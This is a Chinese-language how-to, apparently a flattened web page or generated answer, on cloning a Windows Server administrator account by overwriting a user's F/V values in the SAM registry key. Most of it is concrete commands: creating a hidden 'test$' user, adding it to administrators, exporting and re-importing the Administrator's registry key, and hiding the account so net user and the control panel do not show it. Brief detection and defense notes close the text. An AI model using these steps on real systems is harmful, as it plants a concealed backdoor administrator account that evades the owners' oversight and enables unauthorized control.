Windows Server管理员账户克隆的核心原理是通过修改注册表项,将目标账户的权限属性(F/V值)替换为管理员账户的对应值,从而实现权限继承。以下是具体操作步骤及注意事项:
权限获取
regedit
或regedt32
,找到路径 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
。SAM
项,赋予当前用户完全控制权限以解除默认锁定。目标账户创建
Guest
或自定义隐藏用户),示例命令:
net user test$ Password123 /add
net localgroup administrators test$ /add # 赋予管理员权限(可选)
定位管理员账户键值
000001F4
(对应Administrator
的SID)。000003E9
(对应Guest
或其他用户的SID)。导出并修改注册表项
.reg
文件:
regedit /e admin.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4"
000001F4
替换为目标账户的键值(如000003E9
),并保存。导入并覆盖目标账户
.reg
文件导入注册表,或通过命令行:
regedit /s modified.reg
F
和V
值,而简单克隆仅替换F
值。权限验证
shutdown
命令或访问受限资源)。wmic useraccount get name,sid
检查账户SID是否显示为管理员属性。隐蔽性处理
$
符号(如test$
),避免在net user
或控制面板中显示。net user test$ /del # 删除原始账户(需在导入注册表后操作)
检测方法
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
中异常键值。D盾
或Process Explorer
检测隐藏/克隆账户。防御措施
SAM
项的写入权限。事件ID 4720
(账户创建)和事件ID 4624
(登录记录)。系统兼容性
风险提示
SAM
注册表项或使用reg export
导出原始配置。